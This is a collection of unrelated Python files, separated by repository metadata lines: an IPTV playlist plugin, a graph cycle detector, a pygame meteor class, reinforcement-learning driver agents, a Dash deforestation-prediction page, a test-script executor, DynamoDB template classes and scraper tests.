            del self.cat_list[0]
        items = []
        try:
            url = Utils.b64decoder(stripurl)
            content = Utils.getUrl2(url, referer)
            if six.PY3:
                content = six.ensure_str(content)
            regexcat = '#EXTINF.*?title="(.+?)".*?,(.+?)\\n(.+?)\\n'
            match = re.compile(regexcat, re.DOTALL).findall(content)
            for country, name, url in match:
                # keep only HLS streams
                if ".m3u8" not in url:
                    continue
                url = url.replace(" ", "").replace("\\n", "").replace('\r', '')
                name = name.replace('\r', '')
                name = country + ' | ' + name
                item = name + "###" + url + '\n'
                items.append(item)
            items.sort()
            for item in items:
                name = item.split('###')[0]
                url = item.split('###')[1]
                name = name.capitalize()
                self.cat_list.append(show_(name, url))
            self['menulist'].l.setList(self.cat_list)
            auswahl = self['menulist'].getCurrent()[0][0]
            self['name'].setText(str(auswahl))
        except Exception as e:
            print('exception error ', str(e))
    def ok(self):
        # play the currently highlighted channel
        name = self['menulist'].getCurrent()[0][0]
        url = self['menulist'].getCurrent()[0][1]
        self.play_that_shit(url, name)
    def play_that_shit(self, url, name):
        # hand off to the shared player screen from the parent plugin
        self.session.open(Playstream1, str(name), str(url))
    def exit(self):
        self.close()
| Belfagor2005/xxxplugin | usr/lib/enigma2/python/Plugins/Extensions/xxxplugin/Sites/freearhey.py | freearhey.py | py | 5,713 | python | en | code | 0 | github-code | 36 |
def cycleDetection(edges, n, m):
    """Return "Yes" if the undirected graph contains a cycle, else "No".

    Parameters
    ----------
    edges : iterable of (u, v) pairs with 1-based vertex labels
    n : int
        Number of vertices (labelled 1..n).
    m : int
        Number of edges (unused; kept for interface compatibility).

    Uses a disjoint-set (union-find) with path halving instead of the
    previous recursive DFS. This fixes three defects of the old version:
    it cannot hit Python's recursion limit on long paths, and it correctly
    reports self-loops (u == v) and parallel edges as cycles, which the
    DFS missed because it skipped every edge back to the parent.
    """
    parent = list(range(n + 1))

    def find(x):
        # Path-halving find: point every other node at its grandparent.
        while parent[x] != x:
            parent[x] = parent[parent[x]]
            x = parent[x]
        return x

    for u, v in edges:
        root_u, root_v = find(u), find(v)
        if root_u == root_v:
            # u and v are already connected, so this edge closes a cycle
            # (covers self-loops and duplicate edges too).
            return "Yes"
        parent[root_u] = root_v
    return "No"
2343066126 | import pygame
import Config
import random
import math
import entities
from entity import Entity
class Meteor(Entity):
    """Falling meteor entity: spawns at the top edge with random size, speed
    and heading, damages non-meteor entities on contact and deflects off
    other meteors based on their relative kinetic energy."""
    def __init__(self, img):
        self.x = random.randint(0, Config.WIDTH)
        self.y = 0
        self.size = random.randint(20, 65)
        self.speed = random.randint(3, 5)
        # bigger and faster meteors deal more damage
        self.damage = self.size * self.speed / 10
        self.mass = self.size ** 2
        self.kineticStrong = self.mass * self.speed
        self.startPosition = (self.x, self.y)
        self.img = pygame.transform.rotate(pygame.transform.scale(img, (self.size, self.size)), random.randint(0, 360))
        # heading in degrees; only steep (mostly downward) angles are picked
        self.direction = random.choice([random.randint(-180, -100), random.randint(100, 180)])
        self.isAlive = True
        # NOTE(review): collision radius is a fixed 47px regardless of
        # self.size -- confirm this is intentional.
        self.radius = 47
        self.maxhealth = self.size * 3
        self.health = self.maxhealth
        self.baseRotation = random.randint(1, 10)
        # list of [other_meteor, remaining_cooldown_ms] pairs; prevents the
        # same pair of meteors from re-colliding every frame
        self.contacts = []
    def render(self, window):
        # per-frame update: move, draw, then run all state checks
        self.move()
        self.draw(window)
        self.checkBorders()
        self.checkBeat()
        self.checkHealth()
        self.updateContacts()
    def updateContacts(self):
        # tick down each contact cooldown; drop entries once expired
        clone = self.contacts.copy()
        for contact in clone:
            if contact[1] < 1000 / Config.FPS:
                self.contacts.remove(contact)
            else: contact[1] -= 1000 / Config.FPS
    def checkBeat(self):
        """Resolve collisions: damage non-meteor entities (destroying this
        meteor), or bounce off other meteors not on contact cooldown."""
        clone = entities.entities.copy()
        for entity in clone:
            if not isinstance(entity, Meteor) and entity.checkCollision((self.x, self.y)):
                entity.takeDamage(self.damage)
                self.diy()
            elif isinstance(entity, Meteor) and entity.checkCollisionWithAnotherMeteor(self) and entity != self:
                isContacted = False
                for contact in self.contacts:
                    if contact[0] == entity: isContacted = True
                if not isContacted:
                    # apply the deflection symmetrically to both meteors
                    entity.beat(self)
                    self.beat(entity)
    def beat(self, another):
        # register a 500ms contact cooldown with the other meteor
        self.contacts.append([another, 500])
        def getDifferenceBetweenDegrees(deg1, deg2):
            # compare headings on a 0..360 scale
            if deg1 < 0: deg1 = 360 + deg1
            if deg2 < 0: deg2 = 360 + deg2
            return deg1 - deg2
        # heavier/faster opponents deflect this meteor more strongly
        aks = another.kineticStrong
        self.direction += getDifferenceBetweenDegrees(self.direction, another.direction) * (self.kineticStrong + aks) / aks
        self.fixDirection()
    def checkCollisionWithAnotherMeteor(self, another):
        # circle-circle intersection test on the two collision radii
        return math.sqrt(abs(another.x - self.x) ** 2 + abs(another.y - self.y) ** 2) <= self.radius + another.radius
    def fixDirection(self):
        # wrap the heading back into the (-180, 180] range
        while self.direction > 180:
            self.direction += -360
        while self.direction < -180:
            self.direction += 360
    def draw(self, window):
        window.blit(self.img, (self.x, self.y))
    def diy(self):
        # destroy this meteor (spelling kept: callers use 'diy')
        self.addDeathParticles()
        self.isAlive = False
    def move(self):
        """Advance position one frame along self.direction, where 0 points
        up and +/-180 points down; speed is split between x and y."""
        self.fixDirection()
        def reverse(deg):
            # fold angles beyond +/-90 back into the front half-plane
            if deg > 90: return 180 - deg
            if deg < -90: return -180 - deg
        d = self.direction
        movementX = 0
        movementY = 0
        if d <= 90 and d >= -90:
            movementX = self.speed * -d / 90
        else:
            movementX = self.speed * -reverse(d) / 90
        if d >= 0:
            movementY = self.speed * (90 - d) / 90
        elif d < 0:
            movementY = self.speed * (90 + d) / 90
        self.x += movementX
        self.y -= movementY
    def checkBorders(self):
        # despawn once fully outside the play field
        if self.x > Config.WIDTH + self.size or self.x < -self.size:
            self.isAlive = False
        if self.y > Config.HEIGHT + self.size or self.y < -self.size:
            self.isAlive = False
    def checkHealth(self):
        if self.health <= 0:
            self.diy()
    def addDeathParticles(self):
        entities.effects.explosionEffect((self.x, self.y))
| Krakozaybr/Meteorro | cooperate/meteor.py | meteor.py | py | 3,997 | python | en | code | 0 | github-code | 36 |
17381398214 | """
Implementation of the human and machine policies in the paper
"""
from copy import copy
import random
import numpy as np
import math
import torch
from collections import defaultdict
from environments.env import Environment, GridWorld
from networks.networks import ActorNet
class Agent:
    """Base class for all agents.

    Concrete agents override the hook methods below; the base versions are
    deliberate no-ops so subclasses only implement what they need.
    """

    def __init__(self):
        # Mapping from states to actions; empty until learned/approximated.
        self.policy = {}

    def update_obs(self, *args):
        """Record new observations (no-op in the base class)."""

    def update_policy(self, *args):
        """Revise the action policy from recorded data (no-op here)."""

    def take_action(self, *args):
        """Choose an action according to the current policy (no-op here)."""
class MachineDriverAgent(Agent):
    """Trainable machine driver: an actor network over state features whose
    policy is updated with a weighted policy-gradient step."""
    def __init__(self, n_state_features, n_actions, optimizer, setting=1, c_M=0., entropy_weight=0.01, batch_size=1):
        """Initialize network and hyperparameters.

        n_state_features is a pair: (number of state features,
        network input size). c_M is the machine control cost.
        """
        super(MachineDriverAgent, self).__init__()
        # n_state_features[1] is the network input size
        self.network = ActorNet(n_state_features[1], n_actions)
        self.optimizer = optimizer(self.network.parameters())
        # base entropy-bonus weight; decays as 1/timestep during training
        self.entropy_weight_0 = entropy_weight
        self.timestep = 0
        self.control_cost = c_M
        self.trainable = True
        self.M_t = np.zeros(batch_size)
        self.setting = setting
        # n_state_features[0] is the number of state features
        self.n_state_features = n_state_features[0]
    def update_obs(self, *args):
        """Return input batch for training (not needed for this agent)."""
        pass
    def update_policy(self, weighting, delta, log_pi, entropy, use_entropy=True):
        """
        Implement one policy-gradient train step.

        Parameters
        ----------
        weighting: torch.Tensor
            For off-policy weighting = M_t * rho_t, for on-policy weighting = switch(s)
        delta: torch.Tensor
            For off-policy delta = TD_error, for on-policy delta = v(s)
        log_pi: torch.Tensor
            Log-probability of the taken action under the current policy
        entropy: torch.Tensor
            Entropy of the current action distribution (regularizer)
        use_entropy: bool
            If True, apply the 1/t-decayed entropy bonus
        """
        if use_entropy:
            self.timestep+=1
            self.entropy_weight = self.entropy_weight_0/self.timestep
        else:
            self.entropy_weight = 0
        # weighting and delta must have been computed with torch.no_grad()
        policy_loss = weighting * delta * log_pi + self.entropy_weight*entropy
        policy_loss = policy_loss.mean()
        self.optimizer.zero_grad()
        policy_loss.backward()
        # clip gradients for stability
        torch.nn.utils.clip_grad_norm_(self.network.parameters(), 1.)
        self.optimizer.step()
    def take_action(self, curr_state):
        """
        Return an action given the current state, based on the policy.

        Parameters
        ----------
        curr_state: list of strings
            Current state vector

        Returns
        -------
        action: int
            The action to be taken (never into a wall)
        policy: Categorical
            The (wall-masked) action distribution from the network
        """
        # TODO: make machine worse than human+machine e.g. same feature value for road-grass
        set_curr_state = curr_state
        # in settings 2 and 6 the machine cannot distinguish grass from road
        if self.setting == 2 or self.setting == 6:
            set_curr_state = list(map(lambda x : 'road' if x=='grass' else x, curr_state ))
        state_feature_vector = Environment.state2features(set_curr_state, self.n_state_features)
        actions_logits = self.network(state_feature_vector)
        # actions_logits[actions_logits!=actions_logits] = 0
        valid_action_logits = actions_logits
        # print("logits", actions_logits)
        # # Never choose wall
        # if len(curr_state) > 1:
        #     if curr_state[1] == 'wall':
        #         valid_action_logits = actions_logits[1:]
        #     elif curr_state[3] == 'wall':
        #         valid_action_logits = actions_logits[:2]
        policy = torch.distributions.Categorical(logits=valid_action_logits)
        valid_action_probs = policy.probs
        # clamp tiny probabilities away from zero, then renormalize
        if (policy.probs < 1e-5).any():
            valid_action_probs = valid_action_probs.clamp(1e-5,1-1e-5)
            valid_action_probs = valid_action_probs/valid_action_probs.sum()
        # mask out the action that would drive into a wall (left or right)
        if len(curr_state) > 1:
            if curr_state[1] == 'wall':
                valid_action_probs = valid_action_probs[1:].clamp(1e-5,1-1e-5)
                valid_action_probs = valid_action_probs/valid_action_probs.sum()
                valid_action_probs = torch.squeeze(torch.stack([torch.tensor(0),valid_action_probs[0], valid_action_probs[1]]))
            elif curr_state[3] == 'wall':
                valid_action_probs = valid_action_probs[:2].clamp(1e-5,1-1e-5)
                valid_action_probs = valid_action_probs/valid_action_probs.sum()
                valid_action_probs = torch.squeeze(torch.stack([valid_action_probs[0], valid_action_probs[1], torch.tensor(0)]))
        # valid_action_probs = valid_action_probs.clamp(1e-5, 1.)
        valid_policy = torch.distributions.Categorical(probs=valid_action_probs)
        # print("a", valid_action_probs)
        action = valid_policy.sample().item()
        # sanity check: the masked distribution can never pick a wall
        if len(curr_state) > 1:
            if curr_state[1] == 'wall':
                assert action != 0
            elif curr_state[3] == 'wall':
                assert action != 2
        return action , valid_policy
# Module-level factory (a lambda would not pickle) used as the defaultdict
# default for per-state action counts of the human agents.
def dd_init():
    """Return a fresh zeroed count list, one slot per action."""
    return [0, 0, 0]
class NoisyDriverAgent(Agent):
    """Hand-coded human driver: greedily picks the cheapest cell in the next
    row, but errs uniformly at random with probability prob_wrong and may
    overlook cars with probability p_ignore_car."""
    def __init__(self, env: Environment, prob_wrong: float, setting=1, noise_sw=.0, c_H=0., p_ignore_car=0.5):
        """
        A noisy driver, which chooses the cell with the lowest noisy estimated cost.

        Parameters
        ----------
        env: Environment
        prob_wrong : float
            Probability of picking action at random
        noise_sw : float
            Standard deviation of the Gaussian noise because of switching from Machine to Human
        """
        super(NoisyDriverAgent, self).__init__()
        self.p_ignore_car = p_ignore_car
        self.prob_wrong = prob_wrong
        self.noise_sw = noise_sw
        # walls are infinitely costly so they are never chosen greedily
        self.type_costs = { **env.type_costs, 'wall':np.inf}
        self.control_cost = c_H
        self.trainable = False
        self.setting = setting
        # if True, get_policy uses the closed-form policy below instead of
        # the empirical approximation
        self.actual = True
        self.policy_approximation = defaultdict(dd_init)
    def update_policy(self, state, action, grid_id):
        """Update policy approximation, needed for the off policy stage"""
        # The human action in reality depends only on next row
        human_obs = tuple(state)
        self.policy_approximation[grid_id,human_obs][action]+=1
    def get_policy_approximation(self, state, action, grid_id):
        """ The approximated action policy distribution given the state """
        human_obs = tuple(state)
        total_state_visit = sum(self.policy_approximation[grid_id,human_obs])
        p_human_a_s = self.policy_approximation[grid_id,human_obs][action] / total_state_visit
        return p_human_a_s
    def get_actual_policy(self, state, next_state):
        """Closed-form probability that this driver moves into next_state[0]
        from state; mirrors the sampling logic in take_action."""
        greedy_cell = min(state[1:4], key=lambda x: self.type_costs[x])
        next_cell = next_state[0]
        is_greedy = next_cell == greedy_cell
        # a wall removes one of the three candidate cells
        n_cell = 2 if 'wall' in state[1:4] else 3
        n_opt = sum(1 for cell in state[1:4] if cell == greedy_cell)
        if self.setting == 1:
            # no car-ignoring: greedy with prob 1-prob_wrong, uniform otherwise
            if is_greedy:
                return (1 - self.prob_wrong)/n_opt + self.prob_wrong/n_cell
            else:
                return self.prob_wrong/n_cell
        elif self.setting != 1:
            # settings with car-ignoring: mix over whether cars were seen
            n_road = sum(1 for cell in state[1:4] if cell == 'road')
            n_car = sum(1 for cell in state[1:4] if cell == 'car')
            if is_greedy:
                if next_cell == 'road':
                    mu_a_s = (1 - self.p_ignore_car)*(1 - self.prob_wrong)/n_road + self.p_ignore_car*(1 - self.prob_wrong)/(n_car + n_road) + self.prob_wrong/n_cell
                    return mu_a_s
                elif next_cell == 'car':
                    return 1/n_car
                else:
                    if 'car' in state[1:4]:
                        return (1 - self.p_ignore_car)*(1 - self.prob_wrong)/n_opt + self.prob_wrong/n_cell
                    else:
                        return (1 - self.prob_wrong)/n_opt + self.prob_wrong/n_cell
            else:
                if next_cell =='car':
                    return self.p_ignore_car * (1 - self.prob_wrong)/(n_road +n_car) + self.prob_wrong/n_cell
                else:
                    return self.prob_wrong/n_cell
    def get_policy(self, state, action, grid_id, next_state):
        # dispatch between the closed-form and the empirical policy
        if self.actual:
            return self.get_actual_policy(state, next_state)
        else:
            return self.get_policy_approximation(state, action, grid_id)
    def take_action(self, curr_state, switch=False):
        '''
        current state in form of ['road', 'no-car','car','road','car', ...]
        human considers only next row, not the others
        '''
        # if end of episode is reached
        if len(curr_state) < 4:
            return random.randint(0,2)
        switch_noise = self.noise_sw if switch else 0.
        p_choose = random.random()
        p_ignore = random.random()
        curr_state_for_human = copy(curr_state)
        # ignore stone when switching
        if self.setting >= 4:
            for i, cell_type in enumerate(curr_state[1:4]):
                if cell_type == 'car' and switch:
                    curr_state_for_human[i+1] = 'road'
            if self.setting!=6:
                # with prob p_ignore_car the human fails to see any car
                for i, cell_type in enumerate(curr_state[1:4]):
                    if cell_type == 'car' and p_ignore < self.p_ignore_car:
                        curr_state_for_human[i+1] = 'road'
        # noisy_next_cell_costs = [self.type_costs[nxt_cell_type] + random.gauss(0,estimation_noise) + random.gauss(0, switch_noise) if nxt_cell_type!='wall' else np.inf for nxt_cell_type, estimation_noise in zip(curr_state[2:5], estimation_noises)]
        noisy_next_cell_costs = [self.type_costs[nxt_cell_type] for nxt_cell_type in curr_state_for_human[1:4]]
        # with prob prob_wrong act uniformly over the non-wall actions
        if p_choose < self.prob_wrong:
            if curr_state[1] == 'wall':
                action = random.choices(range(2), [1/2, 1/2])[0] + 1
            elif curr_state[3] == 'wall':
                action = random.choices(range(2), [1/2, 1/2])[0]
            else:
                action = random.choices(range(3), [1/3, 1/3, 1/3])[0]
            return action
        min_estimated_cost = np.min(noisy_next_cell_costs)
        # ties are broken randomly
        possible_actions = np.argwhere(noisy_next_cell_costs == min_estimated_cost).flatten()
        n_possible_actions = possible_actions.size
        action = random.choices(possible_actions, [1/n_possible_actions]*n_possible_actions)[0]
        return action
class RandomDriverAgent(Agent):
    """Baseline driver that acts uniformly at random over the 3 actions."""
    def __init__(self):
        """A random driver """
        super(RandomDriverAgent, self).__init__()
        self.trainable = False
        self.control_cost = 0.0
        # empirical counts of actions per observed state
        self.policy_approximation = defaultdict(dd_init)
    def update_policy(self, state, action):
        """Update policy approximation, needed for the off policy stage"""
        # The human action in reality depends only on next row
        human_obs = tuple(state )
        self.policy_approximation[human_obs][action]+=1
    def get_policy_approximation(self, state, action):
        """ The approximated action policy distribution given the state """
        human_obs = tuple(state )
        total_state_visit = sum(self.policy_approximation[human_obs])
        p_human_a_s = self.policy_approximation[human_obs][action] / total_state_visit
        return p_human_a_s
    def take_action(self, curr_state, switch=False):
        # uniform over the 3 actions; curr_state and switch are ignored
        action = random.choices(range(3), [1/3, 1/3, 1/3])[0]
        return action
class OptimalAgent():
    """Dynamic-programming agent: computes the optimal (minimum-cost)
    time-dependent policy for a GridWorld via finite-horizon value
    iteration over deterministic transitions."""
    def __init__(self, env: GridWorld, control_cost):
        self.env = env
        self.control_cost = control_cost
        # deterministic transition tensor p[x, y, a, x', y'] in {0, 1}
        self.p = np.zeros(shape=(self.env.width,self.env.height, 3, self.env.width,self.env.height))
        for y in range(self.env.height):
            for x in range(self.env.width):
                for a in range(3):
                    nxt_x,nxt_y = self.env.next_coords(x,y,a)
                    self.p[x,y,a,nxt_x,nxt_y] = 1.
        self.policy = self.val_itr()
    def take_action(self, time, coords):
        # sample from the (possibly tied) optimal action distribution
        x,y = coords
        return random.choices(range(3), self.policy[time][x][y])[0]
    def eval(self, n_try=1, plt_path=None):
        """Roll out the optimal policy n_try times and return the mean
        trajectory cost (including the per-step control cost)."""
        total_cost = []
        for i in range(n_try):
            self.env.reset()
            traj_cost = 0
            # NOTE(review): `time` is never incremented inside the loop, so
            # the t=0 slice of the policy is used for every step -- confirm
            # whether `time += 1` was intended here.
            time = 0
            while True:
                cur_coords = self.env.current_coord
                action = self.take_action(time, cur_coords)
                _, cost, finished = self.env.step(action)
                if finished:
                    break
                traj_cost+=cost + self.control_cost
                if plt_path is not None:
                    plt_path.add_line(cur_coords, self.env.current_coord, 'red')
            total_cost.append(traj_cost)
        return np.mean(total_cost)
    def val_itr(self):
        """Backward value iteration over the episode horizon; returns the
        optimal stochastic policy (uniform over tied best actions)."""
        ep_l = self.env.height
        n_ac = 3
        # q_val[time][state][action]
        q_val = np.zeros(shape=(ep_l, self.env.width,self.env.height, n_ac))
        # q_min[time][state]
        q_min = np.zeros(shape=(ep_l + 1, self.env.width,self.env.height))
        # policy[time][state][action]
        policy = np.zeros(shape=(ep_l, self.env.width,self.env.height, n_ac))
        for i in range(ep_l):
            # iterate backwards from the last timestep
            t = ep_l - i - 1
            for y in range(self.env.height):
                for x in range(self.env.width):
                    for a in range(n_ac):
                        nxt_x,nxt_y = self.env.next_coords(x,y,a)
                        # immediate cost of the landing cell + value-to-go
                        q_val[t][x][y][a] = self.env.type_costs[self.env.cell_types[nxt_x,nxt_y]] + np.sum(self.p[x,y,a]* q_min[t + 1])
                    best_actions = np.where(q_val[t][x][y] == np.min(q_val[t][x][y]))[0]
                    policy[t][x,y][best_actions] = 1 / len(best_actions)
                    q_min[t][x][y] = np.min(q_val[t][x][y])
        return policy
75216777705 | from joblib import load
pipeline1 = load('assets/xgb1.joblib')
pipeline2 = load('assets/xgb2.joblib')
# Imports from 3rd party libraries
import dash
import dash_bootstrap_components as dbc
import dash_core_components as dcc
import dash_html_components as html
from dash.dependencies import Input, Output
from xgboost import XGBRegressor
import pandas as pd
import numpy as np
import category_encoders as ce
import plotly.graph_objects as go
# Imports from this application
from app import app
## for chloropleth mapbox usage
mapboxt = open("./amazon/token.txt").read()
# style for controls
style = {'padding': '1.5em'}
# controls start here
layout = html.Div([
dcc.Markdown("""
### Predict
Use the controls below to update your predicted location, based on
area in km^2, day, month, year and state.
*(Predictions based on sample dataset using XGboost model. Check the [Process](https://amazon-deforestation.herokuapp.com/process) page why.)*
"""),
html.Div([
dcc.Markdown('###### Area in km^2'),
dcc.Slider(
id='area',
min=0.062,
max=1.440,
step=0.040,
value=0.090,
marks={n: f'{n:.2f}' for n in np.arange(0.006, 1.440, 0.040)}
),
], style=style),
html.Div([
dcc.Markdown('###### Day'),
dcc.Slider(
id='day',
min=1,
max=30,
step=1,
value=25,
marks={n: str(n) for n in range(1, 31, 1)}
),
], style=style),
html.Div([
dcc.Markdown('###### Month'),
dcc.Slider(
id='month',
min=1,
max=12,
step=1,
value=7,
marks={n: str(n) for n in range(1, 13, 1)}
),
], style=style),
html.Div([
dcc.Markdown('###### Year'),
dcc.Slider(
id='year',
min=2008,
max=2025,
step=1,
value=2017,
marks={n: str(n) for n in range(2008, 2025, 1)}
),
], style=style),
html.Div([
dcc.Markdown('###### State'),
dcc.Dropdown(
id='state',
options=[{'label': state, 'value': state} for state in ['Para', 'Mato Grosso', 'Rondonia', 'Amazonas','Maranhao', 'Acre', 'Roraima', 'Amapa', 'Tocantins']],
value='Para'
),
], style=style),
# Scatter mapbox plot with predictions
html.Div([
dcc.Graph(id='graph')
],
style=style)
])
# get the inputs
@app.callback(
    # Output(component_id='prediction-content', component_property='children'),
    Output(component_id='graph', component_property='figure'),
    [Input(component_id='area', component_property='value'),
    Input(component_id='day', component_property='value'),
    Input(component_id='month', component_property='value'),
    Input(component_id='year', component_property='value'),
    Input(component_id='state', component_property='value')])
# apply model
def predict(area, day, month, year, state):
    """Dash callback: predict the latitude/longitude of a deforestation
    event from the control values and return a mapbox figure.

    Two XGBoost pipelines are used: pipeline1 predicts latitude,
    pipeline2 predicts longitude, each from the same single-row frame.
    """
    df = pd.DataFrame(
        columns=['areakm_squared', 'day', 'month', 'year', 'states'],
        data=[[area, day, month, year, state]])
    y_pred_1 = pipeline1.predict(df)[0]
    y_pred_2 = pipeline2.predict(df)[0]
    # print(y_pred_1)
    # print(y_pred_2)
    # results[0] = predicted latitude, results[1] = predicted longitude
    results = [y_pred_1, y_pred_2]
    graphing = {
        'data': [{
            'type': 'scattermapbox',
            'lat': [results[0]],
            'lon': [results[1]],
            'name':'Predicted location of deforested area',
            'showlegend': True,
            'mode': 'markers',
            'hoverinfo': 'all',
            'text':f'predicted location latitude:{results[0]}, longitude:{results[1]}',
            'marker':go.scattermapbox.Marker(
                size=30,
                color='#E51313',
                opacity=0.8),
            'hovertemplate': f'Predicted location: latitude:{results[0]:.4f}, longitude:{results[1]:.4f} with {area} km^2'
        }],
        # map is centered on the Amazon basin; mapboxt is the access token
        'layout': go.Layout(title_text= f'Predictions for state <b>{state}</b><br> latitude:<b>{results[0]:.4f}</b>, longitude:<b>{results[1]:.4f}</b> with <b>{area}</b> km^2',
                            title_x=0.05, width =1000, height=660,
                            mapbox = dict(center= dict(lat=-5.977402, lon=-58.97948),
                                          accesstoken= mapboxt,
                                          pitch=0,
                                          zoom=4,
                                          style='light'
                                          ),
                            mapbox_style = "streets",
                            showlegend=True,
                            legend=dict(x=0.7, y=1.15))
    }
    return go.Figure(data=graphing['data'], layout=graphing['layout'])
| tigju/Amazon-Deforestation-Prediction-App | pages/predictions.py | predictions.py | py | 4,861 | python | en | code | 1 | github-code | 36 |
40364806637 | import os
import subprocess
from testbot.executors.env_test import EnvironmentTestExecutor
from testbot.executors.errors import ExecutorError
from testbot.task import BotTask
class ScriptEnvironmentTestExecutor(EnvironmentTestExecutor):
    """Executor for 'run-script' test configs: runs a submission's run.sh
    directly in the current environment (no sandboxing or resource limits)
    and collects its stdout/stderr as result artifacts."""
    def __init__(self, task: BotTask, submission_id: int, test_config_id: int):
        super(ScriptEnvironmentTestExecutor, self).__init__(task=task, submission_id=submission_id,
                                                            test_config_id=test_config_id)
        # absolute-ish path to the run.sh script, set in prepare()
        self.run_script = None
        # process env = current env + per-test extra vars, built in prepare()
        self.combined_env_vars = {}

    def prepare(self):
        """Validate the config type, locate run.sh and build the env vars.

        Raises ExecutorError if the config type is wrong or run.sh is
        missing from the work folder.
        """
        super(ScriptEnvironmentTestExecutor, self).prepare()

        config_type = self.test_config['type']
        if config_type != 'run-script':
            raise ExecutorError('invalid config type for %s: %s' % (self.__class__.__name__, config_type))

        # Look for 'run.sh' and we will run it in the current environment directly, which has no system isolation or
        # time/resource/network restrictions.
        run_script = os.path.join(self.work_folder, 'run.sh')
        if not os.path.isfile(run_script):
            raise ExecutorError('Test script "run.sh" not found')
        self.run_script = run_script

        # make a copy of the current environment and add additional env vars
        env = os.environ.copy()
        env.update(self.env_vars)
        self.combined_env_vars = env

    def run(self):
        """Execute run.sh, capture output, map exit codes to exceptions and
        return the extracted result from stdout."""
        super(ScriptEnvironmentTestExecutor, self).run()
        proc_result = subprocess.run(['bash', os.path.abspath(self.run_script)], cwd=self.work_folder,
                                     stdout=subprocess.PIPE, stderr=subprocess.PIPE, env=self.combined_env_vars)
        # keep captured streams as uploadable artifacts
        if proc_result.stdout:
            self.files_to_upload['stdout.txt'] = proc_result.stdout
        if proc_result.stderr:
            self.files_to_upload['stderr.txt'] = proc_result.stderr

        return_code = proc_result.returncode
        if return_code:
            # special exit codes signal timeout/kill; anything else is a
            # generic runtime failure (with stderr errors if extractable)
            if return_code == self.EXIT_STATUS_TIMEOUT:
                raise TimeoutError('Test timeout')
            if return_code == self.EXIT_STATUS_KILLED:
                raise OSError('Test killed')
            errors = self.extract_errors(proc_result.stderr)
            if errors:
                raise RuntimeError(' \n'.join(errors))
            raise RuntimeError('Test returned exit code %d' % return_code)
        return self.extract_result(proc_result.stdout)
| tjumyk/submit-testbot | testbot/executors/env_test_script.py | env_test_script.py | py | 2,449 | python | en | code | 0 | github-code | 36 |
15178487279 | import warnings
from . import AWSHelperFn, AWSObject, AWSProperty
warnings.warn("This module is outdated and will be replaced with "
"troposphere.dynamodb2. Please see the README for "
"instructions on how to prepare for this change.")
class AttributeDefinition(AWSHelperFn):
    """Helper describing a DynamoDB attribute: its name and scalar type."""

    def __init__(self, name, type):
        self.data = {}
        self.data['AttributeName'] = name
        self.data['AttributeType'] = type

    def JSONrepr(self):
        """Return the dict serialized into the CloudFormation template."""
        return self.data
class Key(AWSProperty):
    """Key schema element: pairs an attribute name with its key role
    (HASH or RANGE)."""

    def __init__(self, AttributeName, KeyType):
        self.data = dict(AttributeName=AttributeName, KeyType=KeyType)

    def JSONrepr(self):
        """Return the dict serialized into the CloudFormation template."""
        return self.data
class ProvisionedThroughput(AWSHelperFn):
    """Read/write capacity settings for a table or global secondary
    index."""

    def __init__(self, ReadCapacityUnits, WriteCapacityUnits):
        self.data = dict(
            ReadCapacityUnits=ReadCapacityUnits,
            WriteCapacityUnits=WriteCapacityUnits,
        )

    def JSONrepr(self):
        """Return the dict serialized into the CloudFormation template."""
        return self.data
class Projection(AWSHelperFn):
    """Index projection: which attributes are copied into the index.
    NonKeyAttributes is only emitted when explicitly provided."""

    def __init__(self, ProjectionType, NonKeyAttributes=None):
        self.data = {'ProjectionType': ProjectionType}
        if NonKeyAttributes is not None:
            self.data['NonKeyAttributes'] = NonKeyAttributes

    def JSONrepr(self):
        """Return the dict serialized into the CloudFormation template."""
        return self.data
class GlobalSecondaryIndex(AWSHelperFn):
    """Definition of a DynamoDB global secondary index, which carries its
    own provisioned throughput."""

    def __init__(self, IndexName, KeySchema, Projection,
                 ProvisionedThroughput):
        self.data = dict(
            IndexName=IndexName,
            KeySchema=KeySchema,
            Projection=Projection,
            ProvisionedThroughput=ProvisionedThroughput,
        )

    def JSONrepr(self):
        """Return the dict serialized into the CloudFormation template."""
        return self.data
class LocalSecondaryIndex(AWSHelperFn):
    """Definition of a DynamoDB local secondary index."""
    def __init__(self, IndexName, KeySchema, Projection,
                 ProvisionedThroughput):
        # NOTE(review): ProvisionedThroughput is accepted but never emitted.
        # LSIs share the table's throughput, so it is presumably kept only
        # for signature parity with GlobalSecondaryIndex -- confirm before
        # removing it.
        self.data = {
            'IndexName': IndexName,
            'KeySchema': KeySchema,
            'Projection': Projection,
        }

    def JSONrepr(self):
        # dict serialized into the CloudFormation template
        return self.data
class StreamSpecification(AWSProperty):
    """DynamoDB stream settings; StreamViewType is required.
    Note: ``basestring`` means this module is Python 2 only."""
    props = {
        'StreamViewType': (basestring, True),
    }
class Table(AWSObject):
    """AWS::DynamoDB::Table resource. Each props entry maps a property
    name to (expected type, required flag); validation is performed by
    the AWSObject base class."""
    resource_type = "AWS::DynamoDB::Table"

    props = {
        'AttributeDefinitions': ([AttributeDefinition], True),
        'GlobalSecondaryIndexes': ([GlobalSecondaryIndex], False),
        'KeySchema': ([Key], True),
        'LocalSecondaryIndexes': ([LocalSecondaryIndex], False),
        'ProvisionedThroughput': (ProvisionedThroughput, True),
        'StreamSpecification': (StreamSpecification, False),
        'TableName': (basestring, False),
    }
31833081682 | import pytest
from bs4 import BeautifulSoup
import nerdtracker_client.constants.stats as ntc_stats
from nerdtracker_client.scraper import (
create_scraper,
parse_tracker_html,
retrieve_page_from_tracker,
retrieve_stats,
retrieve_stats_multiple,
)
class TestScraper:
    """Live (network-hitting) tests for retrieve_page_from_tracker; all are
    marked slow and tolerate the scraper's DeprecationWarnings."""
    @pytest.mark.slow
    @pytest.mark.filterwarnings("ignore::DeprecationWarning")
    def test_retrieve_page_from_tracker(
        self, valid_activision_user_string
    ) -> None:
        # A valid user should not trigger the Cloudflare JS challenge page
        scraper = create_scraper()
        soup = retrieve_page_from_tracker(
            scraper, valid_activision_user_string, cold_war_flag=True
        )
        # Check that the soup object does not contain a failed request message
        failed_string = "Enable JavaScript and cookies to continue"
        assert failed_string not in soup.text

    @pytest.mark.slow
    @pytest.mark.filterwarnings("ignore::DeprecationWarning")
    def test_retrieve_invalid_page_from_tracker(
        self, invalid_activision_user_string
    ) -> None:
        # An invalid user yields the tracker's "stats not found" page
        scraper = create_scraper()
        soup = retrieve_page_from_tracker(
            scraper, invalid_activision_user_string, cold_war_flag=True
        )
        # Check that the soup object contains a failed stats message
        failed_string = "stats not found"
        assert failed_string in soup.text

    @pytest.mark.slow
    @pytest.mark.filterwarnings("ignore::DeprecationWarning")
